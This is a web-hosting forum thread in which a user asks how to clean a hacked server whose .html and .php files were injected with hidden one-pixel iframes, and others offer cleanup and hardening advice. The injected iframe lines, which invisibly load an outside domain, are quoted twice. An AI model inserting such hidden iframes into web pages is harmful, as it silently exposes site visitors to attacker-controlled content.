Server get hacked

[vishwas]

Hello,

My server get hacked , what hacker do he runs some script & it puts these two lines in all .html and *.php file and all sites redirects to that domain. mainly it puts these two lines in all index file and its pain to remove these two line with editing each file :S may be its virus !!

Anyone have solution for this !!!!!

<iframe src='http://domain.com/images/index.html' width=1 height=1></iframe>
<iframe src='http://domain.com/images/index.html' width=1 height=1></iframe>

[jaymc]

First thing to do is locate the mal CODE that is doing this

second is to write a simple php script or something to do a search and replace on all .htm files

str_replace()

will be of use

Also, you say 'hacked'... I would call this some one having an account on your server, and takin advantage of the OPEN_BASE security issue you have yet to address, thus giving him access to every file and folder on your server...

He could actually do a lot more than change HTM files, so think your self as lucky

[JohnodACD]

I had this in my server as well it was a file called flame.php that was loaded in a users images folder. when this path was called it redirected all the sites to a forign server(meaning not mine).

When i suspended this site it then redirected all my sites to teh suspend page untill i rebooted teh server.

I also noticed that if you change the password for this domain or account on teh server they can still get access to it so you want to suspend the site if you can find teh files and then delete the files then change teh passowrd.

[AndyReed]

Quote:

Originally Posted by vishwas

Hello,

My server get hacked , what hacker do he runs some script & it puts these two lines in all .html and *.php file and all sites redirects to that domain. mainly it puts these two lines in all index file and its pain to remove these two line with editing each file :S may be its virus !!

Anyone have solution for this !!!!!

<iframe src='http://domain.com/images/index.html' width=1 height=1></iframe>
<iframe src='http://domain.com/images/index.html' width=1 height=1></iframe>

Just in case you are overwhelmed with the cleaning up task, may I suggest you hire a sys admin to round up, secure and protect your server.

[jackie46]

Should he hire you?

[chirpy]

He can if you wishes to. Any has a good reputation on these forums for helping people in such situations, as have others.